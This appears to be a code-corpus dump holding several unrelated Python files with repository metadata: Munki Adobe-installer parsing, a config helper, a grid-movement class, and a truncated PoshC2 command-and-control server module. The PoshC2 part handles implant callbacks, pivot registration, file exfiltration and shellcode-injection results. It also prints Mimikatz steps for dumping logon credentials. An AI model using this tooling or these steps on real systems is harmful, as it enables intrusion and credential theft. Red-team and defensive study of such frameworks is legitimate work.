media_signature += node.nodeValue
for item in osutils.listdir(path):
payloadpath = os.path.join(path, item)
payloadinfo = get_payload_info(payloadpath)
if payloadinfo:
payloads.append(payloadinfo)
if ((driverfolder and item == driverfolder) or
(media_signature and
payloadinfo['AdobeCode'] == media_signature)):
info['display_name'] = payloadinfo['display_name']
info['version'] = payloadinfo['version']
info['AdobeSetupType'] = 'ProductInstall'
if not payloads:
# look for an extensions folder; almost certainly this is an Updater
for (path, dummy_dirs, dummy_files) in os.walk(installroot):
if path.endswith("/extensions"):
for item in osutils.listdir(path):
#skip LanguagePacks
if item.find("LanguagePack") == -1:
itempath = os.path.join(path, item)
payloadinfo = get_payload_info(itempath)
if payloadinfo:
payloads.append(payloadinfo)
# we found an extensions dir,
# so no need to keep walking the install root
break
if payloads:
if len(payloads) == 1:
info['display_name'] = payloads[0]['display_name']
info['version'] = payloads[0]['version']
else:
if 'display_name' not in info:
info['display_name'] = "ADMIN: choose from payloads"
if 'version' not in info:
info['version'] = "ADMIN please set me"
info['payloads'] = payloads
installed_size = 0
for payload in payloads:
installed_size = installed_size + payload.get('installed_size', 0)
info['installed_size'] = installed_size
return info
def get_adobe_package_info(installroot):
'''Gets the package name from the AdobeUberInstaller.xml file;
other info from the payloads folder'''
info = get_adobe_setup_info(installroot)
info['description'] = ""
installerxml = os.path.join(installroot, "AdobeUberInstaller.xml")
if os.path.exists(installerxml):
description = ''
dom = minidom.parse(installerxml)
installinfo = dom.getElementsByTagName("InstallInfo")
if installinfo:
packagedescriptions = \
installinfo[0].getElementsByTagName("PackageDescription")
if packagedescriptions:
prop = packagedescriptions[0]
for node in prop.childNodes:
description += node.nodeValue
if description:
description_parts = description.split(' : ', 1)
info['display_name'] = description_parts[0]
if len(description_parts) > 1:
info['description'] = description_parts[1]
else:
info['description'] = ""
return info
else:
installerxml = os.path.join(installroot, "optionXML.xml")
if os.path.exists(installerxml):
dom = minidom.parse(installerxml)
installinfo = dom.getElementsByTagName("InstallInfo")
if installinfo:
pkgname_elems = installinfo[0].getElementsByTagName(
"PackageName")
if pkgname_elems:
prop = pkgname_elems[0]
pkgname = ""
for node in prop.childNodes:
pkgname += node.nodeValue
info['display_name'] = pkgname
if not info.get('display_name'):
info['display_name'] = os.path.basename(installroot)
return info
def get_xml_text_element(dom_node, name):
'''Returns the text value of the first item found with the given
tagname'''
value = None
subelements = dom_node.getElementsByTagName(name)
if subelements:
value = ''
for node in subelements[0].childNodes:
value += node.nodeValue
return value
def parse_option_xml(option_xml_file):
'''Parses an optionXML.xml file and pulls the items of interest, returning
them in a dictionary'''
info = {}
dom = minidom.parse(option_xml_file)
installinfo = dom.getElementsByTagName('InstallInfo')
if installinfo:
if 'id' in list(installinfo[0].attributes.keys()):
info['packager_id'] = installinfo[0].attributes['id'].value
if 'version' in list(installinfo[0].attributes.keys()):
info['packager_version'] = installinfo[
0].attributes['version'].value
info['package_name'] = get_xml_text_element(
installinfo[0], 'PackageName')
info['package_id'] = get_xml_text_element(installinfo[0], 'PackageID')
info['products'] = []
# CS5 to CC 2015.0-2015.2 releases use RIBS, and we retrieve a
# display name, version and 'mediaSignature' for building installs
# items. SAPCode is also stored so that we can later search by this
# key across both RIBS and HyperDrive installer metadata.
medias_elements = installinfo[0].getElementsByTagName('Medias')
if medias_elements:
media_elements = medias_elements[0].getElementsByTagName('Media')
if media_elements:
for media in media_elements:
product = {}
product['prodName'] = get_xml_text_element(
media, 'prodName')
product['prodVersion'] = get_xml_text_element(
media, 'prodVersion')
product['SAPCode'] = get_xml_text_element(media, 'SAPCode')
setup_elements = media.getElementsByTagName('Setup')
if setup_elements:
media_signature_elements = setup_elements[
0].getElementsByTagName('mediaSignature')
if media_signature_elements:
product['mediaSignature'] = ''
element = media_signature_elements[0]
for node in element.childNodes:
product['mediaSignature'] += node.nodeValue
info['products'].append(product)
# HD (HyperDrive) media for new mid-June 2016 products. We need the
# SAP codes, versions, and which ones are MediaType 'Product'. Support
# payloads seem to all be 'STI', and are listed as STIDependencies under
# the main product.
hd_medias_elements = installinfo[0].getElementsByTagName('HDMedias')
if hd_medias_elements:
hd_media_elements = hd_medias_elements[0].getElementsByTagName(
'HDMedia')
if hd_media_elements:
for hd_media in hd_media_elements:
product = {}
product['hd_installer'] = True
# productVersion is the 'full' version number
# prodVersion seems to be the "customer-facing" version for
# this update
# baseVersion is the first/base version for this standalone
# product/channel/LEID,
# not really needed here so we don't copy it
for elem in [
'mediaLEID',
'prodVersion',
'productVersion',
'SAPCode',
'MediaType',
'TargetFolderName']:
product[elem] = get_xml_text_element(hd_media, elem)
info['products'].append(product)
return info
def get_hd_installer_info(hd_payload_root, sap_code):
'''Attempts to extract some information from a HyperDrive payload
application.json file and return a reduced set in a dict'''
hd_app_info = {}
app_json_path = os.path.join(hd_payload_root, sap_code, 'Application.json')
json_info = json.loads(open(app_json_path, 'r').read())
# Copy some useful top-level keys, useful later for:
# - Name: display_name pkginfo key
# - ProductVersion: version pkginfo key and uninstall XML location
# - SAPCode: an uninstallXml for an installs item if it's a 'core' Type
# - BaseVersion and version: not currently used but may be useful once
# there are more HD installers in the future
for key in ['BaseVersion', 'Name', 'ProductVersion', 'SAPCode', 'version']:
hd_app_info[key] = json_info[key]
hd_app_info['SAPCode'] = json_info['SAPCode']
# Adobe puts an array of dicts in a dict with one key called 'Package'
pkgs = [pkg for pkg in json_info['Packages']['Package']]
hd_app_info['Packages'] = pkgs
return hd_app_info
def get_cs5_media_signature(dirpath):
'''Returns the CS5 mediaSignature for an AAMEE CS5 install.
dirpath is typically the root of a mounted dmg'''
payloads_dir = ""
# look for a payloads folder
for (path, dummy_dirs, dummy_files) in os.walk(dirpath):
if path.endswith('/payloads'):
payloads_dir = path
# return empty-handed if we didn't find a payloads folder
if not payloads_dir:
return ''
# now look for setup.xml
setupxml = os.path.join(payloads_dir, 'Setup.xml')
if os.path.exists(setupxml) and os.path.isfile(setupxml):
# parse the XML
dom = minidom.parse(setupxml)
setup_elements = dom.getElementsByTagName('Setup')
if setup_elements:
media_signature_elements = (
setup_elements[0].getElementsByTagName('mediaSignature'))
if media_signature_elements:
element = media_signature_elements[0]
elementvalue = ''
for node in element.childNodes:
elementvalue += node.nodeValue
return elementvalue
return ""
def get_cs5_uninstall_xml(option_xml_file):
'''Gets the uninstall deployment data from a CS5 installer'''
xml = ''
dom = minidom.parse(option_xml_file)
deployment_info = dom.getElementsByTagName('DeploymentInfo')
if deployment_info:
for info_item in deployment_info:
deployment_uninstall = info_item.getElementsByTagName(
'DeploymentUninstall')
if deployment_uninstall:
deployment_data = deployment_uninstall[0].getElementsByTagName(
'Deployment')
if deployment_data:
deployment = deployment_data[0]
xml += deployment.toxml('UTF-8')
return xml
def count_payloads(dirpath):
'''Attempts to count the payloads in the Adobe installation item.
Used for rough percent-done progress feedback.'''
count = 0
for (path, dummy_dirs, files) in os.walk(dirpath):
if path.endswith("/payloads"):
# RIBS-style installers
for subitem in osutils.listdir(path):
subitempath = os.path.join(path, subitem)
if os.path.isdir(subitempath):
count = count + 1
elif "/HD/" in path and "Application.json" in files:
# we're inside an HD installer directory. The payloads/packages
# are .zip files
zip_file_count = len(
[item for item in files if item.endswith(".zip")])
count = count + zip_file_count
return count
def get_adobe_install_info(installdir):
'''Encapsulates info used by the Adobe Setup/Install app.'''
adobe_install_info = {}
if installdir:
adobe_install_info['media_signature'] = get_cs5_media_signature(
installdir)
adobe_install_info['payload_count'] = count_payloads(installdir)
option_xml_file = os.path.join(installdir, "optionXML.xml")
if os.path.exists(option_xml_file):
adobe_install_info['uninstallxml'] = get_cs5_uninstall_xml(
option_xml_file)
return adobe_install_info
# Disable PyLint complaining about 'invalid' camelCase names
# pylint: disable=invalid-name
def getAdobeCatalogInfo(mountpoint, pkgname=""):
'''Used by makepkginfo to build pkginfo data for Adobe
installers/updaters'''
# look for AdobeDeploymentManager (AAMEE installer)
deploymentmanager = find_adobe_deployment_manager(mountpoint)
if deploymentmanager:
dirpath = os.path.dirname(deploymentmanager)
option_xml_file = os.path.join(dirpath, 'optionXML.xml')
option_xml_info = {}
if os.path.exists(option_xml_file):
option_xml_info = parse_option_xml(option_xml_file)
cataloginfo = get_adobe_package_info(dirpath)
if cataloginfo:
# add some more data
if option_xml_info.get('packager_id') == u'CloudPackager':
# CCP package
cataloginfo['display_name'] = option_xml_info.get(
'package_name', 'unknown')
cataloginfo['name'] = cataloginfo['display_name'].replace(
' ', '')
cataloginfo['uninstallable'] = True
cataloginfo['uninstall_method'] = "AdobeCCPUninstaller"
cataloginfo['installer_type'] = "AdobeCCPInstaller"
cataloginfo['minimum_os_version'] = "10.6.8"
mediasignatures = [
item['mediaSignature']
for item in option_xml_info.get('products', [])
if 'mediaSignature' in item]
else:
# AAMEE package
cataloginfo['name'] = cataloginfo['display_name'].replace(
' ', '')
cataloginfo['uninstallable'] = True
cataloginfo['uninstall_method'] = "AdobeCS5AAMEEPackage"
cataloginfo['installer_type'] = "AdobeCS5AAMEEPackage"
cataloginfo['minimum_os_version'] = "10.5.0"
cataloginfo['adobe_install_info'] = get_adobe_install_info(
installdir=dirpath)
mediasignature = cataloginfo['adobe_install_info'].get(
"media_signature")
mediasignatures = [mediasignature]
# Determine whether we have HD media as well in this installer
hd_metadata_dirs = [
product['TargetFolderName']
for product in option_xml_info['products']
if product.get('hd_installer')]
hd_app_infos = []
for sap_code in hd_metadata_dirs:
hd_app_info = get_hd_installer_info(
os.path.join(dirpath, 'HD'), sap_code)
hd_app_infos.append(hd_app_info)
# 'installs' array will be populated if we have either RIBS
# or HD installers, which may be mixed together in one
# CCP package.
# Acrobat Pro DC doesn't currently generate any useful installs
# info if it's part of a CCP package.
installs = []
# media signatures are used for RIBS (CS5 to CC mid-2015)
if mediasignatures:
# make a default <key>installs</key> array
uninstalldir = "/Library/Application Support/Adobe/Uninstall"
for mediasignature in mediasignatures:
signaturefile = mediasignature + ".db"
filepath = os.path.join(uninstalldir, signaturefile)
installitem = {}
installitem['path'] = filepath
installitem['type'] = 'file'
installs.append(installitem)
# Custom installs items for HD installers seem to need only HDMedias
# from optionXML.xml with a MediaType of 'Product' and their
# 'core' packages (e.g. language packs are 'non-core')
if hd_app_infos:
if 'payloads' not in cataloginfo:
cataloginfo['payloads'] = []
cataloginfo['payloads'].extend(hd_app_infos)
# Calculate installed_size by counting packages in payloads
# in these indexed HD medias. installed_size may exist already
# if this package contained RIBS payloads, so try reading it
# and default to 0. This will typically include several very
# small packages (language or regional recommended settings)
# which would not actually get installed. These seem to be
# no larger than a few MB, so in practice it increases the
# 'installed_size' value by only ~1%.
installed_size = cataloginfo.get('installed_size', 0)
for hd_payload in hd_app_infos:
for package in hd_payload['Packages']:
# Generally, all app installs will include 1-3 'core'
# packages and then additional language/settings/color
# packages which are regional or language-specific.
# If we filter this by including both unconditional
# installs and those which are language/region specific,
# we get a rough approximation of the total size of
# supplemental packages, as their equivalents for other
# languages are very close to the same size. We also
# get one included language package which would be the
# case for any install.
#
# Because InDesign CC 2017 is not like any other package
# and contains a 'Condition' key but as an empty
# string, we explicitly test this case as well.
if ('Condition' not in list(package.keys()) or
package.get('Condition') == '' or
'[installLanguage]==en_US' in
package.get('Condition', '')):
installed_size += int(package.get(
'ExtractSize', 0) / 1024)
# We get much closer to Adobe's "HDSetup" calculated
# install space requirement if we include both the
# DownloadSize and ExtractSize data
# (DownloadSize is just the zip file size)
installed_size += int(package.get(
'DownloadSize', 0) / 1024)
# Add another 300MB for the CC app and plumbing in case they've
# never been installed on the system
installed_size += 307200
cataloginfo['installed_size'] = installed_size
uninstalldir = (
'/Library/Application Support/Adobe/Installers/uninstallXml'
)
product_saps = [
prod['SAPCode'] for
prod in option_xml_info['products']
if prod.get('MediaType') == 'Product'
]
product_app_infos = [app for app in hd_app_infos
if app['SAPCode'] in product_saps]
# if we had only a single HD and no legacy apps, set a sane
# version and display_name derived from the app's metadata
if (len(product_app_infos) == 1) and not mediasignatures:
cataloginfo.update({
'display_name': product_app_infos[0]['Name'],
'version': product_app_infos[0]['ProductVersion'],
})
for app_info in product_app_infos:
for pkg in app_info['Packages']:
# Don't assume 'Type' key always exists. At least the
#'AdobeIllustrator20-Settings'
# package doesn't have this key set.
if pkg.get('Type') == 'core':
# We can't use 'ProductVersion' from
# Application.json for the part following the
# SAPCode, because it's usually too specific and
# won't match the "short" product version.
# We can take 'prodVersion' from the optionXML.xml
# instead.
# We filter out any non-HD installers to avoid
# matching up the wrong versions for packages that
# may contain multiple different major versions of
# a given SAPCode
pkg_prod_vers = [
prod['prodVersion']
for prod in option_xml_info['products']
if prod.get('hd_installer') and
prod['SAPCode'] == app_info['SAPCode']][0]
uninstall_file_name = '_'.join([
app_info['SAPCode'],
pkg_prod_vers.replace('.', '_'),
pkg['PackageName'],
pkg['PackageVersion']]) + '.pimx'
filepath = os.path.join(
uninstalldir, uninstall_file_name)
installitem = {}
installitem['path'] = filepath
installitem['type'] = 'file'
installs.append(installitem)
if installs:
cataloginfo['installs'] = installs
return cataloginfo
# Look for Install.app (Bare metal CS5 install)
# we don't handle this type, but we'll report it
# back so makepkginfo can provide an error message
# installapp = find_install_app(mountpoint)
# if installapp:
# cataloginfo = {}
# cataloginfo['installer_type'] = "AdobeCS5Installer"
# return cataloginfo
# Look for AdobePatchInstaller.app (CS5 updater)
installapp = find_adobepatchinstaller_app(mountpoint)
if os.path.exists(installapp):
# this is a CS5 updater disk image
cataloginfo = get_adobe_package_info(mountpoint)
if cataloginfo:
# add some more data
cataloginfo['name'] = cataloginfo['display_name'].replace(' ', '')
cataloginfo['uninstallable'] = False
cataloginfo['installer_type'] = "AdobeCS5PatchInstaller"
if pkgname:
cataloginfo['package_path'] = pkgname
# make some (hopefully functional) installs items from the payloads
installs = []
uninstalldir = "/Library/Application Support/Adobe/Uninstall"
# first look for a payload with a display_name matching the
# overall display_name
for payload in cataloginfo.get('payloads', []):
if (payload.get('display_name', '') ==
cataloginfo['display_name']):
if 'AdobeCode' in payload:
dbfile = payload['AdobeCode'] + ".db"
filepath = os.path.join(uninstalldir, dbfile)
installitem = {}
installitem['path'] = filepath
installitem['type'] = 'file'
installs.append(installitem)
break
if installs == []:
# didn't find a payload with matching name
# just add all of the non-LangPack payloads
# to the installs list.
for payload in cataloginfo.get('payloads', []):
if 'AdobeCode' in payload:
if ("LangPack" in payload.get("display_name") or
"Language Files" in payload.get(
"display_name")):
# skip Language Packs
continue
dbfile = payload['AdobeCode'] + ".db"
filepath = os.path.join(uninstalldir, dbfile)
installitem = {}
installitem['path'] = filepath
installitem['type'] = 'file'
installs.append(installitem)
cataloginfo['installs'] = installs
return cataloginfo
# Look for AdobeUberInstaller items (CS4 install)
pkgroot = os.path.join(mountpoint, pkgname)
adobeinstallxml = os.path.join(pkgroot, "AdobeUberInstaller.xml")
if os.path.exists(adobeinstallxml):
# this is a CS4 Enterprise Deployment package
cataloginfo = get_adobe_package_info(pkgroot)
if cataloginfo:
# add some more data
cataloginfo['name'] = cataloginfo['display_name'].replace(' ', '')
cataloginfo['uninstallable'] = True
cataloginfo['uninstall_method'] = "AdobeUberUninstaller"
cataloginfo['installer_type'] = "AdobeUberInstaller"
if pkgname:
cataloginfo['package_path'] = pkgname
return cataloginfo
# maybe this is an Adobe update DMG or CS3 installer
# look for Adobe Setup.app
setuppath = find_setup_app(mountpoint)
if setuppath:
cataloginfo = get_adobe_setup_info(mountpoint)
if cataloginfo:
# add some more data
cataloginfo['name'] = cataloginfo['display_name'].replace(' ', '')
cataloginfo['installer_type'] = "AdobeSetup"
if cataloginfo.get('AdobeSetupType') == "ProductInstall":
cataloginfo['uninstallable'] = True
cataloginfo['uninstall_method'] = "AdobeSetup"
else:
cataloginfo['description'] = "Adobe updater"
cataloginfo['uninstallable'] = False
cataloginfo['update_for'] = ["PleaseEditMe-1.0.0.0.0"]
return cataloginfo
# maybe this is an Adobe Acrobat 9 Pro patcher?
acrobatpatcherapp = find_acrobat_patch_app(mountpoint)
if acrobatpatcherapp:
cataloginfo = {}
cataloginfo['installer_type'] = "AdobeAcrobatUpdater"
cataloginfo['uninstallable'] = False
plist = pkgutils.getBundleInfo(acrobatpatcherapp)
cataloginfo['version'] = pkgutils.getVersionString(plist)
cataloginfo['name'] = "AcrobatPro9Update"
cataloginfo['display_name'] = "Adobe Acrobat Pro Update"
cataloginfo['update_for'] = ["AcrobatPro9"]
cataloginfo['RestartAction'] = 'RequireLogout'
cataloginfo['requires'] = []
cataloginfo['installs'] = [
{'CFBundleIdentifier': 'com.adobe.Acrobat.Pro',
'CFBundleName': 'Acrobat',
'CFBundleShortVersionString': cataloginfo['version'],
'path': '/Applications/Adobe Acrobat 9 Pro/Adobe Acrobat Pro.app',
'type': 'application'}
]
return cataloginfo
# didn't find any Adobe installers/updaters we understand
return None
# pylint: enable=invalid-name
if __name__ == '__main__':
print('This is a library of support tools for the Munki Suite.')
| 44.657795
| 80
| 0.565319
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 12,245
| 0.347524
|
35fe055b65de9e34581ebd9b036ec7f195d41986
| 645
|
py
|
Python
|
mandrel/config/helpers.py
|
gf-atebbe/python-mandrel
|
64b90e3265a522ff72019960752bcc716533347f
|
[
"MIT"
] | null | null | null |
mandrel/config/helpers.py
|
gf-atebbe/python-mandrel
|
64b90e3265a522ff72019960752bcc716533347f
|
[
"MIT"
] | null | null | null |
mandrel/config/helpers.py
|
gf-atebbe/python-mandrel
|
64b90e3265a522ff72019960752bcc716533347f
|
[
"MIT"
] | null | null | null |
from .. import util
def configurable_class(setting_name, default_class_name=None):
def getter(self):
value = None
try:
value = self.configuration_get(setting_name)
except KeyError:
pass
if not value:
if not default_class_name:
return None
value = default_class_name
return util.get_by_fqn(value)
def setter(self, value):
if value is not None:
return self.configuration_set(setting_name, util.class_to_fqn(value))
return self.configuration_set(setting_name, None)
return property(getter, setter)
| 25.8
| 81
| 0.626357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
35ff001cebfbaa2f16c6208ca4d5a99ce422a736
| 1,606
|
py
|
Python
|
Components/MoveComponent.py
|
RuoxiQin/Unmanned-Aerial-Vehicle-Tracking
|
49a0a32abcce42fc6bf9e71f5b098ec708373153
|
[
"Apache-2.0"
] | 13
|
2018-06-16T12:52:18.000Z
|
2021-08-14T02:43:24.000Z
|
Components/MoveComponent.py
|
RuoxiQin/Unmanned-Aerial-Vehicle-Tracking
|
49a0a32abcce42fc6bf9e71f5b098ec708373153
|
[
"Apache-2.0"
] | null | null | null |
Components/MoveComponent.py
|
RuoxiQin/Unmanned-Aerial-Vehicle-Tracking
|
49a0a32abcce42fc6bf9e71f5b098ec708373153
|
[
"Apache-2.0"
] | 6
|
2019-06-20T21:06:01.000Z
|
2021-08-14T02:43:28.000Z
|
#!/usr/bin/python
#-*-coding:utf-8-*-
from Component import Component
class MoveComponent(Component):
'''This is the moveable component.'''
_name = 'MoveComponent'
def move(self,cmd):
'''Input L,R,U,D or S to move the component or stop. Rise exception if moving out of region.'''
cmd = cmd.upper()
if cmd == 'L':
if self.position[0]-1 >= 0:
self.position = (self.position[0]-1,self.position[1])
else:
raise MoveOutOfRegion(self,cmd)
elif cmd == 'R':
if self.position[0]+1 < self._region_size[0]:
self.position = (self.position[0]+1,self.position[1])
else:
raise MoveOutOfRegion(self,cmd)
elif cmd == 'U':
if self.position[1]-1 >= 0:
self.position = (self.position[0],self.position[1]-1)
else:
raise MoveOutOfRegion(self,cmd)
elif cmd == 'D':
if self.position[1]+1 < self._region_size[1]:
self.position = (self.position[0],self.position[1]+1)
else:
raise MoveOutOfRegion(self,cmd)
elif cmd == 'S':
pass
def moveable_direction(self):
direction = ['S']
if self.position[0] > 0:
direction.append('L')
if self.position[0] < self._region_size[0]-1:
direction.append('R')
if self.position[1] > 0:
direction.append('U')
if self.position[1] < self._region_size[1]-1:
direction.append('D')
return direction
| 34.170213
| 104
| 0.52802
| 1,533
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 214
| 0.13325
|
35ff5a9fe6f25456cafae5f86dcd151f7638267e
| 35,016
|
py
|
Python
|
poshc2/server/Tasks.py
|
slackr/PoshC2
|
d4804f1f534dac53b95dd6dd6578431beaf79360
|
[
"BSD-3-Clause"
] | 1,504
|
2016-07-12T04:14:00.000Z
|
2022-03-31T02:59:30.000Z
|
poshc2/server/Tasks.py
|
PhilKeeble/PoshC2
|
498b30097e12e46b5aa454feaeaa4bbae3c04c0d
|
[
"BSD-3-Clause"
] | 139
|
2016-10-13T10:41:18.000Z
|
2022-03-31T13:22:47.000Z
|
poshc2/server/Tasks.py
|
PhilKeeble/PoshC2
|
498b30097e12e46b5aa454feaeaa4bbae3c04c0d
|
[
"BSD-3-Clause"
] | 377
|
2016-07-12T03:10:03.000Z
|
2022-03-31T10:04:13.000Z
|
import datetime, hashlib, base64, traceback, os, re
import poshc2.server.database.DB as DB
from poshc2.Colours import Colours
from poshc2.server.Config import ModulesDirectory, DownloadsDirectory, ReportsDirectory
from poshc2.server.Implant import Implant
from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad
from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import translate_power_status
from poshc2.Utils import randomuri
def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
now = datetime.datetime.now()
all_implants = DB.get_implants_all()
if not all_implants:
print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")
return
for implant in all_implants:
implantID = implant.ImplantID
RandomURI = implant.RandomURI
Hostname = implant.Hostname
encKey = implant.Key
Domain = implant.Domain
User = implant.User
implant_type = implant.Pivot
if RandomURI in uriPath and cookieVal:
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
if implant_type == "JXA":
rawoutput = decrypt(encKey, post_data[1500:])
else:
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
cookieMsg = ""
if "-" in decCookie:
decCookie = decCookie.strip('\x00')
splt = decCookie.split("-")
if not splt[0].isdigit():
print(Colours.RED + "[!] Cookie %s is invalid" % decCookie + Colours.GREEN)
return
else:
taskId = str(int(splt[0]))
cookieMsg = splt[1]
else:
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if taskId != "99999":
executedCmd = DB.get_cmd_from_task_id(taskId)
task_owner = DB.get_task_owner(taskId)
else:
print(Colours.END)
timenow = now.strftime("%Y-%m-%d %H:%M:%S")
print(f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)" % ReportsDirectory)
print(Colours.GREEN)
print(rawoutput)
miscData = open(("%sbackground-data.txt" % ReportsDirectory), "a+")
miscData.write(rawoutput)
return
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if cookieMsg is not None and cookieMsg.lower().startswith("pwrstatusmsg"):
translate_power_status(outputParsed, RandomURI)
return
if "loadmodule" in executedCmd and len(outputParsed.split()) == 0:
print("Module loaded successfully")
DB.update_task(taskId, "Module loaded successfully")
elif "pbind-connect " in executedCmd and "PBind-Connected" in outputParsed or "PBind PBind start" in executedCmd and "PBind-Connected" in outputParsed:
outputParsed = re.search("PBind-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("PBind-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
PivotString = "C# PBind"
if "pbind-command run-exe PBind PBind start" in executedCmd:
PivotString = "C# PBind Pivot"
newImplant = Implant(implantID, PivotString, str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
if "pbind-command run-exe PBind PBind start" in executedCmd:
DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
else:
DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed:
outputParsed = re.search("FComm-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("FComm-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif executedCmd.lower().startswith("beacon "):
new_sleep = executedCmd.replace('beacon ', '').strip()
DB.update_sleep(new_sleep, RandomURI)
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = implant.User + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
DB.update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
DB.update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
DB.update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-command run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
DB.update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
counter = 1
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter - 2) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter - 2)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
DB.update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
DB.update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]") or rawoutput.startswith("ErrorCmd"):
DB.update_task(taskId, rawoutput)
print(rawoutput)
else:
dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
dumppath = "%s%s" % (DownloadsDirectory, dumpname)
open(dumppath, 'w').write(rawoutput)
message = "Dump written to: %s" % dumppath
message = message + "\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"
message = message + "\n $filename = '.\\%s'" % dumpname
message = message + "\n $b64 = Get-Content $filename"
message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)"
message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"
message = message + "\n ./mimikatz.exe"
message = message + "\n sekurlsa::minidump safetydump.dmp"
message = message + "\n sekurlsa::logonpasswords"
message = message + "\nOr to just decode on Linux:"
message = message + f"\n base64 -id {dumpname} > dump.bin"
DB.update_task(taskId, message)
print(message)
